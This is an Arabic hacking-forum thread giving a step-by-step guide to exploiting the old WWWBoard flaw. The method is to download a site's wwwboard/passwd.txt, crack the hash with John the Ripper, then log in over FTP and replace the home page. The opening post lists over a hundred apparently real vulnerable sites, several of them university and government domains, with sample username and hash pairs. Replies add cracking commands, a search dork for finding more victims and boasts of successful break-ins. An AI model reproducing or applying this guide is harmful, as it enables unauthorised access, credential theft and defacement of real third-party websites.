السلام عليكم

أولا وقبل كل شي أرجوا عدم استخدام الثغرة فيما يخل بالإسلام وفيما حرمه الله

الآن نبدأ الحديث هذه الثغرة الظاهر طرحت من قبل هنا

ولكنني أعيدها لانها محفوظة عندي من زمااااااان وأحببت أن تبقى الملكية لصاحبها
========================
ثغرة الـWWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE
كلمة المرور:إسم المستخدم
يعني إسم المستخدم هو cknouse
وكلمة المرور هيaexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الذي تم شرحه بالعنوان التالي
http://www.3asfh.com/vb/showthread.php?s=&threadid=653
الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html
وإرفعها للموقع

لتحميل الفتب
http://www.motken.com/dawnload/porogram/wsftppro.zip

للتطبيق

هذه مواقع مصابة بالثغرة
http://members.mint.net/raske/wwwboard/passwd.txt
http://www.avatar-moving.com/kb/wwwboard/passwd.txt
http://espa.virtualave.net/wwwboard/passwd.txt
http://www.dsg-art.com/wwwboard/passwd.txt
http://www.derby.gov.uk/dcc/wwwboard/passwd.txt
http://www.dsg-art.com/wwwboard/passwd.txt
http://www.frebend.com/wwwboard/passwd.txt
http://www.efn.org/~dalep/wwwboard/passwd.txt
http://kidlink.sunet.se/rti/irc/wwwboard/passwd.txt
http://www.hillsidespca.com/wwwboard/passwd.txt
http://www.lionnet.org.tr/118u/wwwboard/passwd.txt
http://www.cytoskeleton.com/wwwboard/passwd.txt
http://www.locon.org/wwwboard/passwd.txt
http://www.kcftoa.org/hazmat/wwwboard/passwd.txt
http://www.boardprep.net/wwwboard/passwd.txt
http://www.wgbhalumni.org/wwwboard/passwd.txt
http://www.creative-design.de/kmt/wwwboard/passwd.txt
http://www.kaapeli.fi/~hekata/wwwboard/passwd.txt
http://www.wbref.ch/wwwboard/passwd.txt
http://www.fys.ku.dk/~voss/utopia/wwwboard/passwd.txt
http://www.awdansey.co.uk/wwwboard/passwd.txt
http://www.mpset.com/wwwboard/passwd.txt
http://www.selectfire.com/wwwboard/passwd.txt
http://www.climbnh.com/wwwboard/passwd.txt
http://cwww.com/wwwboard/passwd.txt
http://sitemanager.hypermart.net/wwwboard/passwd.txt
http://www.foxsden.org/psf/FFE/wwwboard/passwd.txt
http://expert.cc.purdue.edu/~pumsan/wwwboard/passwd.txt
http://wrm.hre.ntou.edu.tw/wrm/wwwboard/passwd.txt
http://www.radiocollege.org/rc/wwwboard/passwd.txt
http://www.firstfives.org/wwwboard/passwd.txt
http://www.adtelfree.com/wwwboard/passwd.txt
http://www.as.ua.edu/arcca/wwwboard/passwd.txt
http://students.cs.byu.edu/~quixote/wwwboard/passwd.txt
http://www.netset.com/~jdennis/wwwboard/passwd.txt
http://www.rit.edu/~jrd4663/cgi-bin/wwwboard/passwd.txt
http://www.i-55.com/andersoninc/wwwboard/passwd.txt
http://www.tiberigroup.com/wwwboard/passwd.txt
http://peakpits.com/wwwboard/passwd.txt
http://www.cjns.com/cyb/cyberair/wwwboard/passwd.txt
http://www.konzert777.de/wwwboard/passwd.txt
http://www.socalhoops.tierranet.com/wwwboard/passwd.txt
http://www.nwlink.com/~nickguy/wwwboard/passwd.txt
http://aasbd.org/wwwboard/passwd.txt
http://ftp.duth.gr/pub/netlib/utk/wwwboard/passwd.txt
http://www.freelance-street.co.uk/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://www.rireformparty.com/wwwboard/passwd.txt
http://gaia.ecs.csus.edu/~brookd/wwwboard/passwd.txt
http://www.rireformparty.com/wwwboard/passwd.txt
http://www.clearlight.com/~brawicz/wwwboard/passwd.txt
http://www.fgm.org/wwwboard/passwd.txt
http://www.chatrap.com/wwwboard/passwd.txt
http://www.kaibutsu-thx.com/cx/htm/wwwboard/passwd.txt
http://camineros.com/wwwboard/passwd.txt
http://www.offroadexchange.com/wwwboard/passwd.txt
http://www.boren.org/wwwboard/passwd.txt
http://crux.baker.edu/myeake01/wwwboard/passwd.txt
http://207.65.96.29/users/akira/wwwboard/passwd.txt
http://www.n2creative.com/wwwboard/password.txt
http://hkbne.virtualave.net/wwwboard/password.txt
http://www.glowinthedarkpaint.com/wwwboard/passwd.txt
http://www.mathpuzzle.com/wwwboard/passwd.txt
http://gybe.com/boggy/swallowtails/wwwboard/passwd.txt
http://idchiro.org/wwwboard/passwd.txt
http://www.thousandfootkrutch.com/wwwboard/passwd.txt
http://uniteddesigngroup.com/wwwboard/passwd.txt
http://www.dawave.com/wwwboard/passwd.txt
http://www.acnetreatment.com/wwwboard/passwd.txt
http://pepup.hypermart.net/wwwboard/passwd.txt
http://gbsystems.com/wwwboard/passwd.txt
http://www.indieport.com/wwwboard/passwd.txt
http://www.utexas.edu/depts/asih/wwwboard/passwd.txt
http://hemi.ps.tsoa.nyu.edu/webchat/passwd.txt
http://www.stenum.at/euinfo/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://students.washington.edu/msa/waami/passwd.txt
http://member.mfea.com/Members/bbs/admin/passwd.txt
http://ais.gmd.de/~sylla/Archive/passwd.txt
http://www.notam.com/forum/passwd.txt
http://www.sandiego.edu/~deroche/group4p/passwd.txt
http://www.sandiego.edu/~deroche/case7/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://indianlake.com/cgibin/passwd.txt
http://www.swe.org/SWE/Convention/den01/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://dykesworld.de/Boards/sistah/passwd.txt
http://www.public.iastate.edu/~n2ddg/IE565/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt
http://www.defenders.by.ru/texts/unix/unix-passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.unionmen.com/forum/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt
http://ponce.inter.edu/forums/passwd.txt
http://students.washington.edu/msa/curriculum/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.motosalvagedirectory.com/forums/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.inece.org/ozone/passwd.txt
http://cds.unina.it/~tuccillo/passwd.txt
http://ponce.inter.edu/forums/prueba/passwd.txt
http://paradigm-dc.hypermart.net/passwd.txt
http://clonetheory.virtualave.net/passwd.txt
http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt
http://www.artintheschool.org/forum/passwd.txt
http://www.mag7.net/floor/passwd.txt
http://www.urban-forestry.com/forum/passwd.txt

الله يا كثرها فك التشفير واشتغل

بس تراها تأخذ وقت طويييييل احيانا في فك التشفير

واذا كان عندك موقع تبي تتأكد أنه مصاب بالثغرة أو لا

تفضل هذا الموقع فهو يعطيك بيانات عن الموقع

http://www.netcraft.com

------------------------------
إنتهى الشرح
جميع الحقوق محفوظة جداً جداً للكاتب الملثم
------------------------------

تحياتي المتمكن

مشكوووووور اخوي على هالثغره

:D :D :D

<<< يبى يروح من الحين يبى يدعبس بالمواقع هذى والاهم موقع اكتشاف الغرات

مشكوور اخوى على الموضوع الشيق ;)

مشكوررررررررررر اخــوي على التغره


والى الامام انشاء الله

المتمكن

مشكور اخوي بس عندي سؤال
الفرونت بيج معروف انه برنامج تصميم بس ال wwwboard ايش هو بالضبط ؟

وبعدين الاحظ بالمواقع اللي انت حاطها موجود wwwboard بعنوان الموقع وبعضها غير موجود؟:)

شكرا مرة اخرى

الف الف شكر اخوي المتمكن

أشكركم جدا جدا للتفاعل:D

وللأخ سهم..تحية وبعد...

أخوي العزيز الثغرة كنت محتفظ بها ولا أدري ماذا تعني كلمة wwwboard

لكن ربما تكون احدى البرامج تركب على المواقع مثل النيوك وسباق المواقع والمنتدىvb ... الخ

وهذه المواقع المذكورة موضوع فيها wwwboard علشان اول ما تضغط على اللنك يدخلك الى مكان الاسم والكلمة المشفرة اختصارا لك حتى لا اتعبك

ولك تحياتي

المتمكن

لكن ..............
لما جيت ابحث عن الباسوورد في ملف johnpro مالقيته !!!!!!! لقيت ملف باسم
passwd وحاولت فتحه باستخدام المفكره بس طلع يحتوي على ارقام كثيره
وين الاقي الباسوورد واليوزر نيم بعد فك التشفير
علما اني سويت الطريقه صح
والف شكر المتمكن على الموضوع

إذا نجح john في فك التشفير

حتلاقي الباسورد أخر الباسوردات المكتوبة و الموجودة في الملف johnpro

|4|

انت مثلاً اخذت باسوورد مشفر الآن وبعدين حطيته في ملف txt اي ملف نصي وسميته بأسم passwd . بعد ما تروح للدوز وتكتب الأوامر .
راح يطلع لك في نفس الدووز اسم المستخدمة وكلمة المرور في قويسين . بعد ما تغلق جوهان . روح إلي مجلد جوهان في رن . راح تحصل ملف بأسم john.por . على شكل بور بوينت . انت اضغط بالزر الأيمن وافتحه بواسطة المفكرة . .
وراح تحصل كلمة السر بداخلة .

علشان الشرح الي بل فلاش مو راضي يطلعلي لي يومين بحاويل:)

أشكرك أخي القرصان على المرور ومساعدة الغير

أشكرك أخي قبلة الموت على المرور والتوضيح الرائع

وزيادة شرح ان الكلمة احيانا تقعد اسابيع واحيانا مرة وحدة ما تنفك التشفير لانه صعب جدا

أخي العزيز Msh Msh Man

هناك أوامر كثيرة لكل أمر خاصية معينة وهي تعتمد على علمك بالموقع ولكن ان كنت تجهل اي شيء عن الكلمة فالأفضل استخدام هذا الأمر

john -i:all passwd.txt

وحتى ان كنت تعلم عنه فاستخدم هذا الأمر لانه يبحث عن جمييييييييييييييييع الاحتمالات لكلمة السر
ملاحظة هذا الأمر john -i:all passwd.txt

آخر كلمة passwd.txt وهذا يقصد به الملف النصي الي بتوضعه داخل ملف john في الدرايف السي على حسب المسمى الي بتسميه للملف النصي

فلو سميته ppp راح تكتب الأمر هكذا john -i:all ppp.txt

ولكن المعتمد تسميته passwd

تحياتي المتمكن

مشكور أخي المتكمن على الأضافة الحلوة ..

والمسمي هو لك لا غير . لكي ما ترتبش فقط .وتعرف ان هذا للباسودرات الي انفكت .

انت حتى سميه بأسمك مو مشكلة .المهم تتذكر ويش سميته

مشكور أخوي قبلة الموت على التوضيح

وكما قلت هذا المسمى معتمد عليه

passwd

تحياتي المتمكن

يا ناس فكيت تشفير 4 باسوردات

لكن :confused::confused: من غير فائده ما قدرت اخترق المواقع

حاولت ببرنامج cute ftp ما فيه فائده و يش السالفه

:confused::confused::confused::confused:

؟؟؟؟؟؟؟؟؟

أخي العزيز كيف ما قدرت

اذا مافاد جرب الدخول الى الموقع

ftp.name.com

واكتب الاسم والكلمة وشوف

تحياتي المتمكن

نزل برنامج الـ LeapFTP ..

استخدمت LeapFTP ما نفع

هل أستخدمت طريقة المتمكن ؟؟؟

جربها اكيد بيتنفعك

ftp.name.com

لانها مرة صارت معي هالمشكلة ولا قدرت احلها الا كذا

تحياتي المتمكن|4|

هلا ياشباب والله موضوع حلو لكن الثغره قدييمه لكن هي موجوده في كثير ن المواقع الأسرائيلية ...
لكن عندي اضافه بسيطه عشان تتوسعو في الموضوع
هذه الطريقة تسمى البحث العشوائي
روح على موقع http://www.altavista.com لأنه يقدم خدمة البحث العنكبوتي
وكتب في الفراغ link:passwd.txt
وخلاص انت دور في الصفحات راح تلاقي مواقع كثيره
روح على جون وردد معاه يالليل ما اطولك
====
ارجوا ان اكون اوصلت لكم معلومه ولو بالشيء البسيط
===
ايش استفسار انا جاهز

تشااااااااو

ثغره وايد حلووووه


انا اخترقت كم موقع من هذه الثغره


;)

بس .. فك التشفير يبله وقت

|3|

مشكور أخي ماكس على التوضيح والأضافة الجميلة ..

مشكور أخي maxhak2000
بس المشكلة في فك التشفير

أخوي almaster
مبرووك عليك المواقع بس ليش ما تروينا محصودك

أخي قبلة الموت
أشكرك لمرورك على الموضوع

تحياتي المتمكن|4|

الله يخليك يا المتمكن .. على فكرة ياشباب . فيه كثير من الأعضاء يضنون أن استخدام الجون ذا ريبر مباشرة دون كتابة أي اوامر في الدوز قبل الدخول إلي جون .. راح اوضح هناك ماهي الأوامر اللازمة كتابتها لو أردنا الدخول لجون ..
فالنفرض أن اسم المجلد john وهو موجود في المحرك C .. وبداخل المجلد john راح نحصل مجلدين وإلي يهمنا مجلد run .. والأوامر ما تتنفذ إلا في المجلد run . .

start ----إبــداء -- Run --- تشغيل .. ( نكتب الأمر التالي ) command واضغط Enter
الآن بعد ما ظهرت لك شاشة الدوز السوداء . راح يكون ا لمسار على سطح المكتب .
c:\windwos\desktop> ونحن نريد ننتقل إلي المحرك C . فلنكتب الأمر مباشرة
( أضغط أنتر c:\windwos\Desktop>cd\ (press Enter
الآن راح يكون ا لمسار بالشكل التالي ..
c:\> فقط لاغير . وبكذا انتقلنا إلي المحرك الـ C . الآن سوف نكتب الأوامر للدخول إلي المجلد جون
c:\>cd john (Press Enter
بعد ما ضغطنا أنتر . راح يكون المسار بالشكل التالي .
c:\john> سوف نكتب الأمر نفسه للدخول إلي المجلد run وراح يكون بالشكل التالي
c:\john>cd run ( بهذا الشكل ننتقل إلي ا لمجلد run وبكذا انهينا المهمة في الأوامر تبع الدوز .. الآن ما عليك إلا كتابة الأوامر تبع جوهان ..

( ملاحظة مهمة )
( يجب كتابة المجلد بالحرف الواحد . دون زيادة اونقصان . لو كان خطاء راح تطلع لك رسالة يقولك ان المسار خطاء .. invailed dircotory .. )

مشكووور

السلام عليكم

مشكور أخوي قبلة الموت على الشرح الرائع والمتميز

اخوي Taz تسلم حبيبي

تحياتي المتمكن|4||4||4|

اخوي المتمكم

يعطيك العافيه علي

الموضوع الي بصراحه استفدت منه كثير

ولك حياتي قبل تحياتي

باااااااااياااااااات

كلام كبير علينا بس ربنا يسهل

يارب صبرنى

http://www.ozq8.com/ram/eng/50-Cent/In-Da-Club.ram

يعطيك العافيه اخوي المتمكن علي التغره

وبانتظار المزيد

حياتي لك قبل تحياتي

اشكركم جميعا على الإطراء وانشا الله قدما نحو الجديد

تحياتي:D

موضوع شييق وجميل جدا تسلم اخي :)

مشكور اخي الغالي وربي يخليك

يعطيك العافيه اخوي المتمكن على شرحك الحلو;)

انا اخذت الشفرة لأحد المواقع اللي انت كتبتها لنا وفكيتها بجون

وعندي برنامج WS_FTP pro

ويطلب مني Host Name or IP Address

كيف اعرفها هذي ؟؟؟ :confused:


تحياتي KSA hacker|4|

وهذي بعد مافكيت الشفرة وين اليوزر وين الباسوورد

aeT4ps/XMpop.:eisin


تحياتي KSA hacker|4|

eisin

واليوزر نيم . راح تحصله أمام الباسوورد المشفر

مشكور على ردك السريع قبلة الموت

هذي الكلمه المشفره karloff:aeT4ps/XMpop.

بعد مافكيت التشفير طلع لي كذا
aeT4ps/XMpop.:eisin


بس مافهمت لها :confused:


تحياتي KSA hacker|4|

ياخوي طال عمرك اغلب كلمات السر المشفره وهميه وللمعلوميه انا قد فكيت اغلبها بس طلعت وهميه تنبيه

اخوي الثغرات يمكن اغلقت ... مش شغالة عندي .

أهلا يا حماعة أية فايدة الموضوع دة أعتقد لو سمحتم يعنى أنة مالوش فايدة ههههههههههههههههههههههههههههههههه

ثانكيو خيو على الموضوع الروعه

الثعبان سالفه انك فكيت اربع باسوردات وماقدرت تخش انه كل كلما ت السر اللى شفتها وهميه والثغرات اللى قالوها قديمه الغبار

السلام عليكم ورحمة الله وبركاته
الله يعطيك العافيه و مشكور يا أخي
و ننتظر مشاركاتك الجميله

http://gybe.com/boggy/swallowtails/wwwboard/passwd.txt
اخي هل اليوزر بهذه الصفحة
هو
swallow
والباسورد
aerUUOfZWAl
واريد برنامج فك التشفير الشرح مو شغال